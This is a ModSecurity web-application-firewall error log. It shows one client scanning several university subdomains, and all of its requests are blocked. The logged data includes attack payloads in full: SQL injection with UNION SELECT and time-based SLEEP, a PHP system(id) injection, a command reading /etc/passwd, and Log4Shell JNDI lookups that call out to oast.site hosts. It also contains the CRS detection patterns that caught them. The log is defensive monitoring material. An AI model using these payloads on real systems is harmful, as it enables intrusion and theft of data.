[Tue Aug 29 11:32:30.311823 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:parent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:parent: \\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ZO103sCo-f0AAAQ9H4EAAAAK"]
[Tue Aug 29 11:32:30.314248 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:parent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:parent: \\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ZO103sCo-f0AAARH7HUAAAAM"]
[Tue Aug 29 11:32:30.348838 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:parent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:parent: \\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ZO103sCo-f0AAAQ83U0AAAAI"]
[Tue Aug 29 11:32:31.308810 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:SPOOLDIR. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:SPOOLDIR: test\\x22.system(id).\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1038Co-f0AAARMMbsAAAAR"]
[Tue Aug 29 11:32:31.309058 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:SPOOLDIR. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:SPOOLDIR: test\\x22.system(id).\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1038Co-f0AAANWgbwAAAAG"]
[Tue Aug 29 11:32:31.310640 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:SPOOLDIR. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:SPOOLDIR: test\\x22.system(id).\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO1038Co-f0AAAN9sWsAAAAJ"]
[Tue Aug 29 11:32:31.311608 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:SPOOLDIR. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:SPOOLDIR: test\\x22.system(id).\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1038Co-f0AAARD1OkAAAAH"]
[Tue Aug 29 11:32:31.312596 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:SPOOLDIR. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:SPOOLDIR: test\\x22.system(id).\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1038Co-f0AAAQ83U4AAAAI"]
[Tue Aug 29 11:32:31.350853 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:SPOOLDIR. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:SPOOLDIR: test\\x22.system(id).\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1038Co-f0AAAQUIGMAAAA2"]
[Tue Aug 29 11:32:32.300623 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\xe2\\x80\\x94\\r\\n [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARNk4wAAAAS"]
[Tue Aug 29 11:32:32.300710 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\x5cxe2\\x5cx80\\x5cx94\\x5cr\\x5cn"] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARNk4wAAAAS"]
[Tue Aug 29 11:32:32.327098 2023] [:error] [pid 1094] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:field: field:exec:head -1/etc/passwd:null:null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO104MCo-f0AAARGwdUAAAAL"]
[Tue Aug 29 11:32:32.369557 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:field: field:exec:head -1/etc/passwd:null:null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO104MCo-f0AAARA7ZsAAAAA"]
[Tue Aug 29 11:32:32.371087 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:field: field:exec:head -1/etc/passwd:null:null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO104MCo-f0AAAQ83VAAAAAI"]
[Tue Aug 29 11:32:32.372493 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\xe2\\x80\\x94\\r\\n [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARNk44AAAAS"]
[Tue Aug 29 11:32:32.372538 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\x5cxe2\\x5cx80\\x5cx94\\x5cr\\x5cn"] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARNk44AAAAS"]
[Tue Aug 29 11:32:32.372700 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:field: field:exec:head -1/etc/passwd:null:null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO104MCo-f0AAARIwIwAAAAO"]
[Tue Aug 29 11:32:32.372980 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:field: field:exec:head -1/etc/passwd:null:null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO104MCo-f0AAAQOv@EAAAAw"]
[Tue Aug 29 11:32:32.373098 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\xe2\\x80\\x94\\r\\n [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAAQUIGUAAAA2"]
[Tue Aug 29 11:32:32.373184 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\x5cxe2\\x5cx80\\x5cx94\\x5cr\\x5cn"] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAAQUIGUAAAA2"]
[Tue Aug 29 11:32:32.392520 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\xe2\\x80\\x94\\r\\n [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARMMb4AAAAR"]
[Tue Aug 29 11:32:32.392563 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\x5cxe2\\x5cx80\\x5cx94\\x5cr\\x5cn"] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARMMb4AAAAR"]
[Tue Aug 29 11:32:32.392686 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\xe2\\x80\\x94\\r\\n [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARNk48AAAAS"]
[Tue Aug 29 11:32:32.392732 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\x5cxe2\\x5cx80\\x5cx94\\x5cr\\x5cn"] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARNk48AAAAS"]
[Tue Aug 29 11:32:32.400881 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\xe2\\x80\\x94\\r\\n [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAAPDoHMAAAAP"]
[Tue Aug 29 11:32:32.400951 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\x5cxe2\\x5cx80\\x5cx94\\x5cr\\x5cn"] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAAPDoHMAAAAP"]
[Tue Aug 29 11:32:32.412001 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:field: field:exec:head -1/etc/passwd:null:null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO104MCo-f0AAARLXvIAAAAQ"]
[Tue Aug 29 11:32:35.354748 2023] [:error] [pid 1094] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgpk36r36js3bom.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgpk36r36js3bom.oast.site}: ${jndi:ldap://${hostName}.cookievalue.cjmn8l5jmimk2adbbnlgiyxwx3e9mq8q8.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO1048Co-f0AAARGwdkAAAAL"]
[Tue Aug 29 11:32:35.361319 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgbiax4azyetp8b.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgbiax4azyetp8b.oast.site}: ${jndi:ldap://${hostName}.cookievalue.cjmn8l5jmimk2adbbnlgzhpgwkgm8ud5a.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO1048Co-f0AAARIwI8AAAAO"]
[Tue Aug 29 11:32:36.361504 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'hsvT'='hsvT found within ARGS:username: 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/login.php"] [unique_id "ZO105MCo-f0AAARH7H4AAAAM"]
[Tue Aug 29 11:32:36.363645 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'hsvT'='hsvT found within ARGS:username: 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/login.php"] [unique_id "ZO105MCo-f0AAAQ9H4cAAAAK"]
[Tue Aug 29 11:32:36.366635 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'hsvT'='hsvT found within ARGS:username: 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/login.php"] [unique_id "ZO105MCo-f0AAARMMcEAAAAR"]
